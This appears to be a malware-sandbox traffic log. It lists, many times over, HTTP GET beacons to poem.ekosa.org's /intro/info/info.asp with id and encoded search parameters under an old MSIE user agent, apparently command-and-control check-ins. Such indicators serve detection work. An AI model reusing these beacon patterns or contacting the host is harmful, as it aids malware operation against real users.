Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
